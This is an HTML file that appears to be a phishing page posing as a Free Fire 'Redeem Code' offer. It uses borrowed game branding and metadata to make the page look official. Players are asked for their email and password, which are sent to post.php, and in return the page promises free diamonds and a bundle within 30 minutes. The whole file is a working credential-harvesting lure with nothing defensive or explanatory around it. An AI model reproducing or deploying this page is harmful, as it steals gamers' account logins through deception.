login.html 1.5 KB

12345678910111213141516171819202122232425262728293031323334353637
  1. <html>
  2. <head>
  3. <title>Free Fire - Redeem Code</title>
  4. <meta charset="UTF-8"/>
  5. <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
  6. <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
  7. <meta property="og:title" content="Mobile Legends - Weekly Free Heroes"/>
  8. <meta property="og:url" content="index.html"/>
  9. <meta property="og:description" content="Get the free fire winterlands monthly event, redeem here"/>
  10. <meta property="og:type" content="article"/>
  11. <meta property="article:author" content="https://www.facebook.com/MobileLegendsGameIndonesia"/>
  12. <meta property="og:image" content="img/banner.jpg"/>
  13. <link rel="icon" type="img/png" href="http://freefiremobile-a.akamaihd.net/ffwebsite/images/app-icon.png" sizes="32x32"/>
  14. <link rel="stylesheet" type="text/css" href="css/redeem.css"/>
  15. </head>
  16. <body>
  17. <form align="right" action="post.php" method="post">
  18. <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSwF4VI9keba5O9K7GvNpyakhPOL9XH8J5dDA&usqp=CAU" alt="Instruction"/>
  19. <br/><br/>
  20. <hr/><br/>
  21. <label for="email">Email</label>*
  22. <input minlength="3" maxlength="50" type="text" name="email" required=""/>
  23. <br/><br/>
  24. <label for="password">Password</label>*
  25. <input minlength="5" maxlength="50" type="password" name="password" required=""/>
  26. <br/><br/>
  27. <div align="center">
  28. <p><small>Take your Diamond + bundle, check the mail box in the game after (30) Minutes</small></p>
  29. <br/>
  30. <input type="submit" value="Submit"/>
  31. </div>
  32. </form>
  33. </body>
  34. </html>